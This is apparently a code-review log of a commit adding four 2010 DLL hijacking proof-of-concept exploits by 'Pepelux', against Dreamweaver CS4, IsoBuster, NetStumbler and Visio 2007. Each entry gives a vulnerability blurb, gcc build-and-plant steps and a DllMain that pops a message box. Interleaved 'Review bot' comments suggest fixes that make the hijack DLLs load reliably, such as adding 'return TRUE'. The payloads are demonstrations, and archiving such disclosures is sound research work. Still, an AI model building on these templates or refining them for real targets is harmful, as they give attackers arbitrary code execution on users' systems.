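Review bot: #include "stdafx.h" references a Visual Studio precompiled header that is not part of this commit, so the file cannot build standalone; #include <windows.h> is what the code actually needs. MessageBox is called with narrow string literals, which only compiles in an ANSI (non-UNICODE) project, so MessageBoxA would be more portable. The usage text says to create a file "with one of the following extensions" but no extensions follow, unlike the IsoBuster file in this commit; list them or drop the sentence.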

@ -0,0 +1,43 @@
source: http://www.securityfocus.com/bid/43911/info
Adobe Dreamweaver CS4 is prone to a vulnerability that lets attackers execute arbitrary code.
An attacker can exploit this issue by enticing a legitimate user to use the vulnerable application to open a file from a network share location that contains a specially crafted Dynamic Linked Library (DLL) file.
/*
============================================================================
Adobe Dreamweaver CS4 - v10.0 Build 4117 DLL Hijacking Exploit (mfc80esn.dll)
=============================================================================
$ Program: Adobe Dreamweaver
$ Version: v10.0 Build 4117
$ Download: http://www.adobe.com/es/products/dreamweaver/
$ Date: 2010/10/08
Found by Pepelux <pepelux[at]enye-sec.org>
http://www.pepelux.org
eNYe-Sec - www.enye-sec.org
Tested on: Windows XP SP2 && Windows XP SP3
How to use :
1> Compile this code as mfc80esn.dll
gcc -shared -o mfc80esn.dll thiscode.c
2> Move DLL file to the directory where Dreamweaver is installed
3> Open any file recognized by Dreamweaver
*/
#include <windows.h>
#define DllExport __declspec (dllexport)
int mes()
{
MessageBox(0, "DLL Hijacking vulnerable", "Pepelux", MB_OK);
return 0;
}
BOOL WINAPI DllMain (
HANDLE hinstDLL,
DWORD fdwReason,
LPVOID lpvReserved)
{mes();}
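Review bot: DllMain is declared BOOL WINAPI but its body {mes();} returns nothing, so the loader reads an undefined return value and may treat the load as failed; add "return TRUE;". The DllExport macro is defined but never used, hinstDLL is typed HANDLE where HINSTANCE is conventional, and mes() relies on MessageBox resolving to the ANSI variant, which holds for the gcc command shown but not for a UNICODE build.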

@ -0,0 +1,48 @@
source: http://www.securityfocus.com/bid/43912/info
IsoBuster is prone to a vulnerability that lets attackers execute arbitrary code.
An attacker can exploit this issue by enticing a legitimate user to use the vulnerable application to open a file from a network share location that contains a specially crafted Dynamic Link Library (DLL) file.
IsoBuster 2.7 is vulnerable; other versions may also be affected.
/*
==================================================================
IsoBuster v2.7 (Build 2.7.0.0) DLL Hijacking Exploit (wnaspi32.dll)
===================================================================
$ Program: IsoBuster
$ Version: v2.7 (Build 2.7.0.0)
$ Download: http://www.isobuster.com/
$ Date: 2010/10/08
Found by Pepelux <pepelux[at]enye-sec.org>
http://www.pepelux.org
eNYe-Sec - www.enye-sec.org
Tested on: Windows XP SP2 && Windows XP SP3
Extensions: " .rar && .r00 ... .r99 && .zoo "
How to use :
1> Compile this code as wnaspi32.dll
gcc -shared -o wnaspi32.dll thiscode.c
2> Move DLL file to the directory where IsoBuster is installed
3> Open any file recognized by isobuster
*/
#include <windows.h>
#define DllExport __declspec (dllexport)
int mes()
{
MessageBox(0, "DLL Hijacking vulnerable", "Pepelux", MB_OK);
return 0;
}
BOOL WINAPI DllMain (
HANDLE hinstDLL,
DWORD fdwReason,
LPVOID lpvReserved)
{mes();}
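Review bot: same defects as the Dreamweaver file in this commit: DllMain has no return statement although it is declared BOOL, the DllExport macro is unused, and hinstDLL is typed HANDLE rather than HINSTANCE; add "return TRUE;" at minimum. The header's Extensions line is useful and is the kind of detail the Dupehunter file in this commit is missing.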

@ -0,0 +1,45 @@
source: http://www.securityfocus.com/bid/43913/info
NetStumbler is prone to a vulnerability that lets attackers execute arbitrary code.
An attacker can exploit this issue by enticing a legitimate user to use the vulnerable application to open a file from a network share location that contains a specially crafted Dynamic Link Library (DLL) file.
NetStumbler 0.4.0 is vulnerable; other versions may also be affected.
/*
=========================================================
NetStumbler - v0.4.0 DLL Hijacking Exploit (mfc71esn.dll)
=========================================================
$ Program: NetStumbler
$ Version: 0.4.0
$ Download: http://www.netstumbler.com/
$ Date: 2010/10/08
Found by Pepelux <pepelux[at]enye-sec.org>
http://www.pepelux.org
eNYe-Sec - www.enye-sec.org
Tested on: Windows XP SP2 && Windows XP SP3
How to use :
1> Compile this code as mfc80esn.dll
gcc -shared -o mfc80esn.dll thiscode.c
2> Move DLL file to the directory where NetStumbler is installed
3> Open any file recognized by NetStumbler
*/
#include <windows.h>
#define DllExport __declspec (dllexport)
int mes()
{
MessageBox(0, "DLL Hijacking vulnerable", "Pepelux", MB_OK);
return 0;
}
BOOL WINAPI DllMain (
HANDLE hinstDLL,
DWORD fdwReason,
LPVOID lpvReserved)
{mes();}
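Review bot: the header and the files.csv title name mfc71esn.dll, but the "How to use" steps build mfc80esn.dll ("gcc -shared -o mfc80esn.dll thiscode.c"), which is the DLL name used in the Dreamweaver and Visio files; the instructions should match the header, since a reader following them would produce a DLL under the wrong name. DllMain also lacks a "return TRUE;", as in the other Pepelux files in this commit.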

@ -0,0 +1,45 @@
source: http://www.securityfocus.com/bid/43914/info
Microsoft Visio is prone to a vulnerability that lets attackers execute arbitrary code.
An attacker can exploit this issue by enticing a legitimate user to use the vulnerable application to open a file from a network share location that contains a specially crafted Dynamic Link Library (DLL) file.
Microsoft Visio 2007 is vulnerable; other versions may also be affected.
/*
=========================================================
Microsoft Visio 2007 DLL Hijacking Exploit (mfc80esn.dll)
=========================================================
$ Program: MS Visio
$ Version: 2007
$ Download: http://office.microsoft.com/es-es/downloads/CH010225969.aspx
$ Date: 2010/10/08
Found by Pepelux <pepelux[at]enye-sec.org>
http://www.pepelux.org
eNYe-Sec - www.enye-sec.org
Tested on: Windows XP SP2 && Windows XP SP3
How to use :
1> Compile this code as mfc80esn.dll
gcc -shared -o mfc80esn.dll thiscode.c
2> Move DLL file to the directory where Visio is installed
3> Open any file recognized by msvisio
*/
#include <windows.h>
#define DllExport __declspec (dllexport)
int mes()
{
MessageBox(0, "DLL Hijacking vulnerable", "Pepelux", MB_OK);
return 0;
}
BOOL WINAPI DllMain (
HANDLE hinstDLL,
DWORD fdwReason,
LPVOID lpvReserved)
{mes();}
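Review bot: DllMain is declared BOOL WINAPI but returns nothing; add "return TRUE;" so the loader does not read an undefined value. The description says Microsoft Visio 2007 is vulnerable but neither it nor the header records which Visio build was tested, whereas the other Pepelux files state the exact version; adding it would make the entry reproducible.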